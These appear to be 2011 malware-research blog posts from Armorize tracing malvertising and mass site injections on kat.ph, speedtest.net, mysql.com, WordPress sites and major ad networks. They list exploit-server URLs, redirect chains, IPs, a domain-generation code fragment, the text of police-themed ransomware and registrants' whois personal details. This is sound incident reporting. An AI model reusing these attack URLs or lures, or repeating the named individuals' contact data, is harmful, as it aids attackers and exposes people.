Armorize Malware Blog

Malvertising on KickAssTorrents (kat.ph) , OpenX compromised to serve fake anti-virus "Security Sphere 2012"

2011-10-15T21:20:00.000-07:00

(Credits: Wayne Huang, Chris Hsiao, NightCola Lin)

Yesterday our HackAlert website malware monitoring service told us that KickAssTorrents (kat.ph), ranked 321 globally on Alexa with more than 1.5 million unique visitors per month, is serving malware to all of its visitors via malvertising. Below is a video showing how visitors are infected:

Coincidentally, KickAss Torrents published a blog post on Oct 10th in response to the website being flagged by antivirus vendor Avast. In it they said:
===================
Our users that are using the Avast anti-virus might have noticed that KAT.ph suddenly became labeled as a dangerous website for users that are not logged in. We want to assure our users that KickassTorrents has no malware or viruses of any kind and it is absolutely safe to use our website. We already contacted Avast and currently we are trying to find and fix the cause of this problem. You will help us if you choose the "Report the file as a false positive" option if you get the alert.
===================

In another thread, KickAss Torrents said:

===================
Now what the hell does this error mean?
First of all, don't flip out, don't go post on the KAT site, post down here if you experience the same problem.
Secondly, report down here if you experience this error.
Thirdly, add kat.ph to the safe URLs in your AV.
And lastly, please go to this site and report the problem (Avast! users only):
Avast! forum thread
Back on topic. What is this error? Does error roughly means that your anti-virus software has found some bad code in an iFrame. This could be from the site itself, or from advertisements. An iFrame is a piece of code that allows you to do several things. Embedding something to your site is a good example.
I hope this topic helps a little and I certainly hope the error is going to be fixed now.
Q&A:
Q: OMFG IS KAT HACKED?
A: Nope, just some error.
Q: Is it really safe to visit KAT?
A: Yes, it is.
===================

KickAss Torrents also referred to this discussion thread on Avast's forum. At the end of the forum it appears that Avast has acknowledged that it was indeed a false positive and have addressed the issue:

===================
Hello,

It should be solved, if not let us know please.

Miroslav Jenšík
AVAST Software a.s.
===================

Well, that time it might have been a false positive from Avast, but this time the website is absolutely infecting its visitors, as seen in our video.

[Summary]

Here we summarize characteristics worth noting:

1. High traffic website compromised.
2. Malvertising via compromising KickAssTorrents' OpenX platform.
3. Spreading fake antivirus "Security Sphere 2012" by conducting a drive-by download process. Simply navigating to the website with an outdated browsing platform will result in infection. No clicks necessary (see video).
4. Same attackers responsible for the recent speedtest.net incident.
5. Using DynDNS domains for their exploit server.
6. Domain names are auto-calculated using Javascript. The algorithm used generates a (predicable) different dyndns.tv domain name every hour, in the format of roboABCD.tv, where ABCD are characters with a fixed seed and incremented by one character every different UTC hour.
7. The new dyndns domain for the next hour is generated every hour precisely at minutes 2 to 5, so this may be done by an automated mechanism.
8. Initial antivirus detection rates are very low, from 0 to 2 vendors out of 43 on VirusTotal.
9. All generated domains resolve to a single IP: 184.22.224.154 (AS21788, United States Scranton Network Operations Center Inc), located in the US.
10. The domain: obama-president.com resolves to this IP and is serving the same exploit pack. This domain was registered on Aug 4th through an Russian registrar, 1'ST DOMAIN NAME SERVICE www.1dns.ru. At this time the domain resolved to an Netherlands IP 85.17.93.9. The domain started to resolve to 184.22.224.154 on Aug 23rd. This IP and the president-obama.com domain are both currently still up and working.

[Details]

KickAssTorrents serves its ads via its OpenX installation at ad.kat.ph. This platform has been compromised and made to serve browser exploits. In our video, this URL:

http://ad.kat.ph/delivery/ajs.php?zoneid=4&target=_blank&charset=UTF-8&cb=95920847237&charset=UTF-8&loc=http%3A//www.kat.ph/§ion=1939940

was injected with malicious javascript. In the following code snippet, the highlighted sections are the injected part. Note the code isn't just a few lines of "injection"--the code is merged with the original OpenX html code:

The following is the important parts of the decoded version:

From line 29-41, we can see that the function spelled() generates four characters based on the current hour in UTC. From line 18 we can see how this function is called: var gyrally = spelled(String("robo"), new String(".dynd" + "ns.tvmg7j".substr(0, 5)));

Antivirus detection of the dropped and installed malicious binary was 2 out of 42 vendors on VirusTotal.

And finally, here's a screenshot of the installed fake antivirus Security Sphere 2012:

http://jjghui.com/urchin.js mass infection ongoing

2011-10-12T12:58:00.000-07:00

(Credit: Wayne Huang, Chris Hsiao, NightCola Lin)
Starting Oct 9th, we've been tracing an mass injection attempt. Currently, there's been 180,000 affected pages, according to Google.

The attack targets visitors of six particular languages--English, German, French, Italian, Polish, and Breton, seen from the following deobfuscated script:

Here is a text version of the above decoded script.

The scripts causes the visiting browser to load an iframe first from www3.strongdefenseiz.in and then from www2.safetosecurity.rr.nu. Multiple browser-based drive-by download exploits are served depending on the visiting browser.

In a drive-by download attack, visitors who navigate to the infected websites will be installed with malware on their machines without their knowledge. This is if they have outdated browsing platforms (browser or Adobe PDF or Adobe Flash or Java etc).

This wave of mass injection incident is targeting ASP ASP.NET websites.

Currently, the 6 out of 43 antivirus vendors on VirusTotal can detect the dropped malware.

jjghui.com resolves to IP 146.185.248.3 (AS3999), which is in Russia. www3.strongdefenseiz.in resolves to 75.102.21.121 (AS36352), which is in the US and hosted by HostForWeb.com. www2.safetosecurity.rr.nu resolves to IP 67.208.74.71 (AS33597), which is in the US and hosted by InfoRelayOnlineSystems.

The dropped malware attempts to connect to: 65.98.83.115 (AS25653), which is in the US.

[Details]

1. ASP and ASP.NET websites are injected with the following script (text is here):

2. Contents of urchin.js is as seen below; full text is here.

3. The above script decodes to the following:

Here is a text version of the above decoded script.

4. The above script generates an iframe to www3.strongdefenseiz.in, which gives an HTTP 302 redirect to the exploit server at www2.safetosecurity.rr.nu.

Malvertising lifecycle case study 1--OpenX compromise on speedtest.net, spreading Security Sphere 2012 fake antivirus

2011-10-10T03:52:00.000-07:00

(Credits: Wayne Huang, Chris Hsiao, NightCola Lin)

Incident: SpeedTest.net, ranked 541 on Alexa with 8,141,777 unique visitors and 10,177,221 page views per month, fell victim to malvertising and was spreading the "Security Sphere 2012" fake antivirus to its visitors. By simply navigating to the website, visitors with outdated browsing environments (browser or browser plugins such as Java, Adobe Flash, Adobe PDF Reader, etc) will end up with Security Sphere permanently installed inside their systems.

Malware: By claiming that every application "has been infected by malware and cannot be executed," Security Sphere 2012 basically locks down the infected computer until the victim purchases a "license" for it to "clean up the infections."

Cause: SpeedTest.net runs its own online advertisement platform using OpenX, using the domain ads.ookla.com. The attackers have compromised this OpenX platform and injected an malicious iframe into every ad served. We have a video of the how visitors are infected:

Malware Lifecycle: Initially, the detection rate on VirusTotal was 0 out of 43:

The malware detects common VMs (virtual machines) and will not execute inside a VM or sandbox. This helps it avoid detection.

Below is a timeline of the malware lifecycle. We missed to submit in some spots so the timeline isn't 100% accurate, but it gives a good idea:

2011-09-XX 00:00 UTC Initial injection into SpeedTest.net and other websites
|
|
(Anvirirus companies do not have this particular malware sample and therefore no one is detecting it)
|
(We don't know how long this period was)
|
|
2011-09-30 09:23 UTC 0 / 43, we first submitted the sample to VirusTotal. Because all 43 participating antivirus vendors are in partnership with VirusTotal, they should all have this sample once we've submitted it.

2011-09-30 11:00 UTC 2 / 43, Kaspersky, NOD32

2011-09-30 15:00 UTC 3 / 43, Dr. Web

2011-09-30 19:00 UTC 7 / 43, Comodo, Emsissoft, Microsoft, Panda

2011-09-30 23:00 UTC 9 / 43, AVG, Symantec

2011-10-01 03:00 UTC 14 / 43, BitDefender, F-Secure, GData, PCTools, SUPERAntiSpyware

2011-10-01 07:00 UTC 14 / 43,

2011-10-01 11:00 UTC 17 / 43, Avast, McAfee, VIPRE

2011-10-01 15:00 UTC 17 / 43,

2011-10-01 19:00 UTC 22 / 43, Ahn-Lab-V3, Ikarus, K7AntiVirus, McAfee-GW-Edition, Sophos

2011-10-01 23:00 UTC 22 / 43,

2011-10-02 03:00 UTC 22 / 43,

2011-10-02 07:00 UTC 22 / 43,

2011-10-02 11:00 UTC 22 / 43,

2011-10-02 15:00 UTC 22 / 43,

2011-10-02 19:00 UTC 22 / 43,

2011-10-02 23:00 UTC 22 / 43,

2011-10-03 03:00 UTC 22 / 43,

2011-10-03 07:00 UTC 22 / 43,

2011-10-03 11:00 UTC 30 / 43, AntiVir, Antiy-AVL, CAT-QuickHeal, Emsisoft, TheHacker, TrendMicro, TrendMicro-HouseCall, VirusBuster

2011-10-03 15:00 UTC 30 / 43,

2011-10-03 19:00 UTC 31 / 43, nProtect

2011-10-03 23:00 UTC 31 / 43,

2011-10-04 03:00 UTC 31 / 43,

2011-10-04 07:00 UTC 31/ 43,

2011-10-04 11:00 UTC 31 / 43,

2011-10-04 15:00 UTC 31 / 43,

2011-10-04 19:00 UTC 31 / 43,

2011-10-04 23:00 UTC 31 / 43,

2011-10-05 03:00 UTC 31 / 43,

2011-10-05 07:00 UTC 31 / 43,

2011-10-05 11:00 UTC 32 / 43, eTrust-Vet

2011-10-05 15:00 UTC 32 / 43,

2011-10-05 19:00 UTC 32 / 43,

2011-10-05 23:00 UTC 32 / 43,

2011-10-06 03:00 UTC 32 / 43,

2011-10-06 07:00 UTC 32 / 43,

2011-10-06 11:00 UTC 33 / 43, Fortinet

2011-10-06 15:00 UTC 33 / 43,

2011-10-06 19:00 UTC 33 / 43,

2011-10-06 23:00 UTC 33 / 43,

2011-10-07 03:00 UTC 33 / 43,

2011-10-07 07:00 UTC 33 / 43,

2011-10-07 11:00 UTC 33 / 43,

2011-10-07 15:00 UTC 33 / 43,

2011-10-07 19:00 UTC 33 / 43,

2011-10-07 23:00 UTC 33 / 43,

2011-10-08 03:00 UTC 33 / 43,

2011-10-08 07:00 UTC 33 / 43,

2011-10-08 11:00 UTC 33 / 43,

2011-10-08 15:00 UTC 33 / 43,

2011-10-08 19:00 UTC 33 / 43,

2011-10-08 23:00 UTC 33 / 43,

2011-10-09 03:00 UTC 33 / 43,

2011-10-09 07:00 UTC 33 / 43,

2011-10-09 11:00 UTC 33 / 43,

2011-10-09 15:00 UTC 33 / 43,

2011-10-09 19:00 UTC 34 / 43, JIangmin

2011-10-09 23:00 UTC 34 / 43,

Still undetecting: ByteHero, ClamAV, Commtouch, eSafe, F-Prot, Prevx, Rising, VBA32, ViRobot

Mass WordPress infection ongoing--most malicious domains using changeip.com

2011-10-09T05:43:00.000-07:00

(credits: Wayne Huang, Chris Hsiao, NightCola Lin)
(
To peer researchers: As we all know, researching security incidents take a lot of time and sacrifice; as if they know exactly how to make our lives harder, attackers often launch right before the weekend or a long vacation. In such an event, we often need to sacrifice our personal plans to be with our families, in order to research and publish threats fast enough.

In the past, usually right after we publish our blog and tweet the link, some other security blogs will very quickly put out a post regarding the same incident. Usually there will be a link to our original post, and we appreciate this very much.

However, recently, for some of our posts, we feel our contents were plainly copied and there was no credit linking to us. We sincerely hope this won't happen.

Together as a security community, we have a common goal--to make the Internet a safer place for everyone. It's an honor to be a part of this community, and we have a lot of respect for everyone involved. We just don't like the feeling of being taken advantage of. Thanks very much everyone!
)

We've been tracking an ongoing mass WordPress infection that began to take place around Oct 5th, as detected by our HackAlert Website monitoring service. Many Wordpress sites have been hit. Using technologyadvances.net as an example, we've created a video showing how an affected WordPress site can infect its visitors.

[Summary]
1. Location of injected script: in the index page of the compromised website.
2. Means of compromise: we believe via a combination of a) stolen WordPress passwords b) backdoors into previously compromised WordPress websites and c) Automated script-injection tools that work in combination of either (a) or (b).
3. Injected script: In the [Details] section we've included an example of an injected script. There are more than 20 variations.
4. Script packer used: Dean Edwards' packer.
5. Malware: Multiple malware will be installed (dropped) onto the visitors machines without the users' knowledge. Antivirus detection rate is around 5 out of 43 vendors on VirusTotal at the time of this writing.
6. Infected websites: A lot of WordPress websites have been hit, a sample list is as follows:

http://technologyadvances.net/
http://dacwada.com/
http://gadgetgad.com/
http://atozdogbreed.com/
http://goaonwheels.com/
http://uprofitpro.com/
http://fitnorama.com/
http://wpsupportdesk.com/
http://positivelypowerful.com/
http://mybravetruehero.com/
http://heavingdeadcats.com/
http://wpsupportdesk.com/
http://pakprwire.com/
http://browndoggadgets.com/
http://ozfoodtrainer.com/
http://batangyagit.com/
http://bellamediterranean.com/
http://michaelbang.com/
http://kharlota.com/
http://prendilo.com/
http://bilgizah.com/
http://rapidshareleaks.com/
http://girlsonandroid.com/
http://keyhousemedia.com/
http://ryan-key.com/
http://theme-wordpress.com/
http://bx-design.com/
http://the396.com/
http://riverstreetsavannah.com/
http://jardin-jms.com/
http://civitanews.it/
http://capture-the-light.de/
http://spio.it/
http://smfbd.org/
http://utopianwebstrategy.com.au/
http://techmoes.com/
http://24print.lv/
http://vancsa.com/
http://hsncweb.org/
http://anyabarat.hu/
http://creativevisions.org/
http://znews24.com/
http://insidegames.ch/
http://pujckainfo.cz/
http://hdmovies.ro/
http://facilefinanza.it/
http://eflomi.de/
http://lavorareonline.org/
http://shamanicseduction.net/
http://zhutoo.com/
http://fvrc.ru/
http://amazingresorts.co.uk/
http://fotoskaufen.de/
http://vus.de/
http://pohodaveskole.net/
http://geekyfaust.info/
http://tblt.de/
http://internetbusinessuniversity.net/
http://www.paypal-deals.nl/
http://athletics.midsouthcc.edu/
http://blog.asolorep.org/
http://www.nc-council.org/
http://www.paypal-nederland.nl/
http://www.paypal-promo.nl/
http://www.paypal-deals.nl/
http://www.midsouthcc.edu/finaid/
http://www.steinway-gallery.com.sg/

7. Malicous domains: This time, instead of owning the malicious domains themselves, the attackers are using mostly the dynamic DNS service provided by changeip.com. A sample list is as follows:

http://qwqe.dnset.com/showthread.php?t=72241732
http://fadfgsa.toh.info/showthread.php?t=72241732
http://fdfsd.ftp1.biz/showthread.php?t=72241732
http://gsdgs.ftp1.biz/showthread.php?t=72241732
http://fdsfad.4dq.com/showthread.php?t=72241732
http://qwqewqr.ce.ms/showthread.php?t=72241732
http://vxzdbgvsx.ce.ms/showthread.php?t=72241732
http://vgfsgfd.ns02.us/showthread.php?t=72241732
http://fdsfgs.qpoe.com/showthread.php?t=72241732
http://fdafdas.jkub.com/showthread.php?t=72241732
http://vfsgdf.ce.ms/showthread.php?t=72241732
http://fdafad.ce.ms/showthread.php?t=72241732
http://fdafdas.ce.ms/showthread.php?t=72241732
http://fdasfad.ce.ms/showthread.php?t=72241732
http://vfsgdf.ce.ms/showthread.php?t=72241732
http://ghdhgdf.gr8name.biz/showthread.php?t=72241732
http://fadsvzx.3-a.net/showthread.php?t=72241732
http://fdhd.2waky.com/showthread.php?t=72241732
http://gsdgs.ddns.info/showthread.php?t=72241732
http://fdafad.dns04.com/showthread.php?t=72241732
http://fadfda.epac.to/showthread.php?t=72241732
http://ghdhgdf.gr8name.biz/showthread.php?t=72241732
http://fadfa.isasecret.com/showthread.php?t=72241732
http://fdafda.itemdb.com/showthread.php?t=72241732
http://fzxvz.ninth.biz/showthread.php?t=72241732
http://gsfgs.dns-stuff.com/showthread.php?t=72241732
http://fdafd.dns-dns.com/showthread.php?t=72241732
http://fdafda.dynssl.com/showthread.php?t=72291731
http://wqwwer.ce.ms/showthread.php?t=72291731
http://vandamm.345.pl/iframe.php?id=2b8325qvzjut0iv8b87u9nlxnan0kpc

8. Malicous domains: Although all of the above domains were resolving through changeip.com, there are only a few IPs used so far, including the following:

1. 95.163.66.209 (Primary IP, AS12695, Russian Federation Moscow Digital Networks Cjsc)
2. 64.131.75.19 (AS25847, United States New York Smv)
3. 182.18.185.82 (AS18229, India Hyderabad IP Pool For Znet)

9. Exploit pack: *NOT* BlackHole, still analyzing

10. Is your WordPress infected? A very simple way is to check for the existence of the following text: a) showthread b) 72241732 c) 72291731 and if these exist, have a closer look. You can also use the HackAlert Website monitoring service to have your site monitored 24x7.

[Details]

The injection has a simple chain:

1. Index page of a WordPress site is injected with script packed by Dean Edwards' packer
2. Javascript generates iframe to a malicious domain registered with changeip.com
3. Browser loads the exploit pack from the malicious domain, hosting on a few fixed IPs including 95.163.66.209 (Russia), 64.131.75.19 (USA), and 182.18.185.82 (India).

Below is an example of an injected script:

Depending on the browsing platform used, several malicious binaries are dropped upon successful exploitation. At the time of this writing, the antivirus detection rate is 5 out of 43 vendors on VirusTotal:

mysql.com hacked, infecting visitors with malware

2011-09-26T08:17:00.000-07:00

(Credit: Wayne Huang, Chris Hsiao, NightCola Lin)

Our HackAlert 24x7 Website malware monitoring platform today indicated that mysql.com has been hacked and is currently serving malware. The highlighted section of the above screenshot is the injected script. Below is a video showing how visitors are infected when navigating to the site:

[Infection Chain]

Step 1: http://www.mysql.com

Causes the visiting browser to load the following:

Step 2: http://mysql.com/common/js/s_code_remote.js?ver=20091011

This is the injection point. The entire content of the above .js file can be found here.

The injected section is shown in the above screenshot. The decoded version is as follows:

The text version is available here. This script generates an iframe to Step 3.

Step 3: http://falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/

Throws out a 302 redirect to Step 4.

Step 4: http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php

This domain hosts the BlackHole exploit pack. It exploits the visitor's browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, ...), and upon successful exploitation, permanently installs a piece of malware into the visitor's machine, without the visitor's knowledge. The visitor doesn't need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.

Currently, 4 out of 44 vendors on VirusTotal can detect this piece of malware.

[The Attacker]

We don't know much at this point. The following are information regarding the associated malicious domains.

falosfax.in (Step 3)
Address: 212.95.63.201
Location: Germany / Berlin
Created On:20-Jun-2011 13:17:05 UTC
Sponsoring Registrar:Transecute Solutions Pvt. Ltd. (R120-AFIN)
Registrant Name:CHRISTOPHER J KLEIN
Registrant Street1:7880 SW 132 STREET
Registrant City:MIAMI
Registrant State/Province:Florida
Registrant Postal Code:33156
Registrant Country:US
Registrant Phone:+1.3053771635
Registrant Email:cjklein54@yahoo.com
Admin ID:TS_14483505
Admin Name:CHRISTOPHER J KLEIN
Admin Organization:N/A
Admin Street1:7880 SW 132 STREET
Admin Street2:
Admin Street3:
Admin City:MIAMI
Admin State/Province:Florida
Admin Postal Code:33156
Admin Country:US
Admin Phone:+1.3053771635
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:cjklein54@yahoo.com
Tech Email:cjklein54@yahoo.com
Name Server:NS1.SKYNS1.NET
Name Server:NS2.SKYNS1.NET

truruhfhqnviaosdpruejeslsuy.cx.cc (Step 4)
Address: 46.16.233.108
Location: Sweden / Stockholm

The mysql.com website is as of now, still serving this exploit and malware.

We're in the process of contacting mysql.com. If anyone have contacts to them, please drop us an email at wayne@armorize.com

PS: Armorize is hiring presales in the bay area: http://www.linkedin.com/jobs/post?displayJobStatus=&jobId=1910971&split_page=1

Malvertising on Yahoo YieldManager, spreading ransomeware acting as Federal German Police (BKA)--Help solve the puzzle!

2011-08-31T12:25:00.000-07:00

Help us solve the puzzle!
(credits: Wayne Huang, Chris Hsiao, NightCola Lin)

Over the past few days, our HackAlert scanning farm has constantly detected malvertising on Yahoo YieldManager (RightMedia). Since YieldManager is one of the world's largest ad networks, websites worldwide, big and small, have all been hit. Fortunately, the exploit server is only serving the malware to German visitors.

In our following video, we demonstrated how Ziddu was thus infected to serve this German ransomware to its visitors. According to CheckSiteTraffic.com, Ziddu enjoys 1,492,133 page views and 364,825 unique visitors per day.

The malware pretends to be a crime-detection software from the Federal German Police. It claims to have found child pornography along with other illegal content on the victim's computer. It claims that the victim's IP, OS, location, ISP, etc, have all been recorded, and locks down the computer completely, "to prevent further abuse."

A fine of 100 Euros must be paid within 24 hours to unlock the computer, or else all data will be deleted. We are in the process of informing all parties involved. This is our report.

(Above: ziddu.com hit by malvertising on Yahoo YieldManager (RightMedia)

(Above: Even Japanese sites were hit)

(Above: The installed Ransomeware--acting as Federal German Police (BKA))

Below is our video report:

Table of contents
[Summary]
[Attack Trace]
[Malvertising Analysis--The Puzzle]
[The malware]

[Summary]

Incident type: Malvertising
Incident subtype: Drive-by download, ransomware
Responsible ad network: Yahoo YieldManager (RightMedia)
Affected websites: Very large websites like ziddu.com to worldwide websites large and small. Ziddu for example has 1,492,133 page views and 364,825 unique visitors per day.
Affected visitors: German visitors only
Fake advertiser: kineticgames.info
Exploit server: BlackHole exploit pack running on town.incredibleoutcomes.com
Malicious domains:
kineticgames.info (184.172.216.234, ASN 36351, US Dallas)
sahoreen.in (184.172.216.234, ASN 36351, US Dallas)
belygaur.in (184.172.216.234, ASN 36351, US Dallas)
town.incredibleoutcomes.com (195.200.90.129, ASN 35524, Ukraine)
bundespol.net (188.229.97.2, ASN 44872, Romanina)

Associated names and emails:
einzahlung@bundespol.net
Vasiliy Pushkin, vasili006@gmail.com
Piotr Pushkin, pppiotr88@gmail.com

[Attack Trace]
Using ziddu.com as example.

Link 1: (Publisher)
Ziddu's website includes the following ad tag:

<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://ad.globe7.com/st?ad_type=iframe&ad_size=728x90&section=836122"></IFRAME>

Link 2: (Ad Network) http://ad.globe7.com/st?ad_type=iframe&ad_size=728x90§ion=836122 is loaded, which contains javascript that generates an iframe to:

Link 3: (Ad Network) http://ad.globe7.com/imp?Z=728x90&s=836122&_salt=2314211323&B=10&u=http%3A%2F%2Fwww.ziddu.com%2F&r=0, which throws back an HTTP 302 redirect to:

Link 4: (Ad Network) http://ad.yieldmanager.com/imp?Z=728x90&s=836122&_salt=2314211323&B=10&u=http%3A%2F%2Fwww.ziddu.com%2F&r=0, which contains javascript that generates an iframe to:

Link 5: (Ad Network) http://ad.globe7.com/iframe3?2YA.ABrCDABgVKUAAAAAAMWJKAAAAAAAAgAEAAYAAAAAAP8AAAACBvPdGQAAAAAAIrsPAAAAAACYIzUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZlQYAAAAAAAIAAwAAAAAAASuHFtnOtz8BK4cW2c63PwErhxbZzsc.ASuHFtnOxz8zMzMzMzPTPzMzMzMzM9M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkuxJPXfCjCqRit3MeuQtEnvXOi1a6Cp0X0hsNAAAAAA==,,http%3A%2F%2Fwww.ziddu.com%2F,B%3D10%26Z%3D728x90%26_salt%3D2314211323%26r%3D0%26s%3D836122,a5451910-d1f1-11e0-906f-87d5341e0e89, which throws an HTTP 302 redirect to:

Link 6: (Ad Network) http://ad.yieldmanager.com/iframe3?2YA.ABrCDABgVKUAAAAAAMWJKAAAAAAAAgAEAAYAAAAAAP8AAAACBvPdGQAAAAAAIrsPAAAAAACYIzUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZlQYAAAAAAAIAAwAAAAAAASuHFtnOtz8BK4cW2c63PwErhxbZzsc.ASuHFtnOxz8zMzMzMzPTPzMzMzMzM9M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkuxJPXfCjCqRit3MeuQtEnvXOi1a6Cp0X0hsNAAAAAA==,,http%3A%2F%2Fwww.ziddu.com%2F,B%3D10%26Z%3D728x90%26_salt%3D2314211323%26r%3D0%26s%3D836122,a5451910-d1f1-11e0-906f-87d5341e0e89, which contains javascript that a) displays the malicious ad, and b) generates an iframe to the exploit server. Note the iframe URL ends with .jpg in order to disguise and be less obvious.

(full copy-able text can be found on snipt here>
Link 7-a: (Fake Advertiser, Creative) http://kineticgames.info/images/728x90-1-1.gif, which is the actual malicous creative (malvertisement).

Link 7-b: (Fake Advertiser, malicious script) http://kineticgames.info/pubage/728x90.jpg, although the URL ends in .jpg, it's actually serving HTML containing an iframe pointing to:

Link 8: (Malicious redirector) http://sahoreen.in/hitcounter.php?u=pubage, which contains an iframe pointing to:

Link 9: (Malicious redirector) http://belygaur.in/ts/in.cgi?pubage, which throws an HTTP 302 redirect pointing to the exploit server:

Link 10: (Exploit server) http://town.incredibleoutcomes.com/index.php?tp=7058439543afabcf, serves BlackHole exploit pack. This isn't a malicious domain registered by the attacker, but a legitimate but compromised domain.

[Malvertising Analysis--The Puzzle]

Below are some causes of malvertising:

a) The attacker pretends to be a legitimate advertiser, submits a malicious ad (malvertisement) to an ad network, and tricks the ad network into accepting the submission.

b) The ad network was compromised, and the attacker injected malicious scripts into a link in the ad-serving chain.

So which case is this? Well for this particular case, it was a bit difficult for us to determine.

Upon first look, it seems to be case (a), because the advertiser in this case--kineticgames.info (184.172.216.234, ASN 36351, US Dallas), has a whois record with a Russian name and street address, yet is using an US IP and an Indian domain name for its name server (ns1.plumdook.in).

HOWEVER, the domain was registered on Aug 9th, 2010, which was a year ago, and from the screenshot below you can see that it sees to be quite a legitimate website:

Compared to many malvertising incidents we've studied, most fake domains will have been registered very recently and will either not have any website content, or will have content illegally mirrored (copied) from other websites.

This doesn't seem to be the case. So, is it case (b), where kineticgames.info is indeed a legitimate website, but have been compromised to serve malvertisements?

Seems reasonable, but only until we look at the other associated malicious domains. These are:

sahoreen.in (184.172.216.234, ASN 36351, US Dallas)
belygaur.in (184.172.216.234, ASN 36351, US Dallas)

These two domains were both created very recently, on the same day--July 7th, 2011. The whois records show the registrant to be "Piotr Poshkin," which resembles kineticgames.info's current "Vasiliy Pushkin." Furthermore, the phone number, street address, and zip codes are exactly the same as kineticgames.info's.

Kineticgames.info actually has a sister domain name: kinetic-games.com, registered on the same day last year (Aug 9th, 2010), and serving the same content. Both were initially registered under Bob Stevenson of Spain. Then, on July 14th and July 17th, 2011, kinetic-games.com and kineticgames.info were respectively transfered to the current contact (according to whois records) "Vasiliy Pushkin" of Russia.

Could it be, that it is the new owner, who is intentionally doing malvertising using these domains and the website, because the identity is seemingly legit?

Or could it be, that none of these matters, and that kineticgames.info simply have been hacked into and the attackers used it to submit malvertisement, and intentionally registered the malicious redirector domains sahoreen.in and belygaur.in to have whois records that resemble that of kineticgames.info?

Finally, two additional pieces of important information. First, according to Internet Archive (Wayback Machine), as of Jan 28th, 2011, kinetic-games.com had no actual website content--the owner was just registering the domain to sell as a premium domain:

Second, the website as of now, contains lots of vulnerabilities. It should be quite easy for someone to hack into both websites.

So what's the deal here?

We cannot make a conclusion right here. Perhaps the reader can help solve the puzzle?

[The Malware]

The malware pretends to be a crime-detection software from the Federal German Police. You can see in the screenshot above, it's using logo stolen from the real Federal German Police (Bundespolizei). It claims to have found child pornography along with other illegal content on the victim's computer. It claims that the victim's IP, OS, location, ISP, etc, have all been recorded, and locks down the computer completely, "to prevent further abuse."

A fine of 100 Euros must be paid within 24 hours to unlock the computer, or else all data will be deleted. We are in the process of informing all parties involved. This is our report.

This thread of ransomware has been around for a few months already, but improvements seen in this version include:

a) They now have an email "einzahlung@bundespol.net" that somewhat resembles the Federal German Police, who uses "@bundespolizei.de. The domain was registered through Bizcn.com, a registrar in China.

b) They now support two payment gateways, UKash and paysafecard.

Below is a translation of the text:

Attention!

Illegal operational activities have been detected. Based on laws of the Federal Republic of Germany, the system has been locked. The following legal violation has been detected: Your IP _______ was detected to have visited pages containing pornography, child pornography, bestiality and violence against children. At the same time, your computer has been identified to contain video files involving pornography, violence, and child pornography content! Furthermore, spam emails containing terrorism content were also sent from here. Your computer is therefore locked in order to eliminate the above illegal activities.

Your details:
IP, location, OS, ISP, etc.

In order to unlock this computer, you are obligated by law to pay a 100 Euro fine. You must make the payment within 24 hours. If payment has not been made within the allotted time, your hard disk will be irreversibly formatted.

1) Payment via Ukash:

To perform the transaction, please enter your purchased voucher code into the payment textbox and press OK. In case of errors, you should email your code to einzahlung@bundespol.net.

2) Payment via paysafecard:

Please input the code into the payment textbox and press OK. In case of errors, you should email your code to einzahlung@bundespol.net.

Malvertising on Google Doubleclick ongoing

2011-08-25T05:01:00.000-07:00

(credits: Wayne Huang, Chris Hsiao, NightCola Lin)

In the past few days, our scanners noticed malvertising on Google DoubleClick. The malvertisement is being provided to DoubleClick by Adify (Now a part of Cox Digital Solutions), and to Adify by Pulpo Media, and to Pulpo Media by the malicious attackers pretending to be advertisers: indistic.com. The malvertisement causes visitor browsers to load exploits from kokojamba.cz.cc (the exploit domain), which is running the BlackHole exploit pack. Currently, 7 out of 44 vendors on VirusTotal can detect this malware.

This is our report. We plan to put up the video later--we still need to narrate it, which will take some time. As DoubleClick is a very large AD network, we decided to put up the post quickly.

The first link in the infection chain is the following standard script for all websites using Google DoubleClick for Publishers (Google DFP):

(Link 1:)
<script type='text/javascript' src='hxxp://partner.googleadservices.com/gampad/google_service.js'>

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 2:)
http://partner.googleadservices.com/gampad/google_ads.js

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 3:)
http://pubads.g.doubleclick.net/gampad/ads?correlator=1314244145446&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-1199834677431615&slotname=LA_PRENSA_Poderes_728x90_Superior&page_slots=LA_PRENSA_Poderes_728x90_Superior&cookie=ID%3D6ece38c99f627779%3AT%3D1314244080%3AS%3DALNI_MbRwmcAoAFohCjkKxnj_JXcxZEUEA&url=http%3A%2F%2Fwww.laprensa.com.ni%2F2011%2F08%2F23%2Fpoderes&lmt=1314244147&dt=1314244147962&cc=100&oe=utf-8&biw=878&bih=477&ifi=1&adk=2910702588&u_tz=480&u_his=2&u_java=true&u_h=1920&u_w=1080&u_ah=1892&u_aw=1080&u_cd=32&flash=10.1.102.64&gads=v2&ga_vid=2122880267.1314244061&ga_sid=1314244061&ga_hid=187578555&ga_fc=true

Which generates a <script src> tag, causing the browser to load javascript from Adify (Now a part of Cox Digital Solutions):

(Link 4:)
http://ad.afy11.net/srad.js?azId=1000004110207

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 5:)
http://ad.afy11.net/ad?asId=1000004110207&sd=2x728x90&ct=15&enc=1&nif=1&sf=0&sfd=0&ynw=0&anw=1&rand=55943306&rk1=56285031&rk2=1314244149.806&pt=0&asc=3x133&vad=878x477

Which generates an iframe, causing the browser to load javascript from tentaculos.net, which is a part of Pulpo Media:

(Link 6:)
http://d1.tentaculos.net/afr.php?zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE

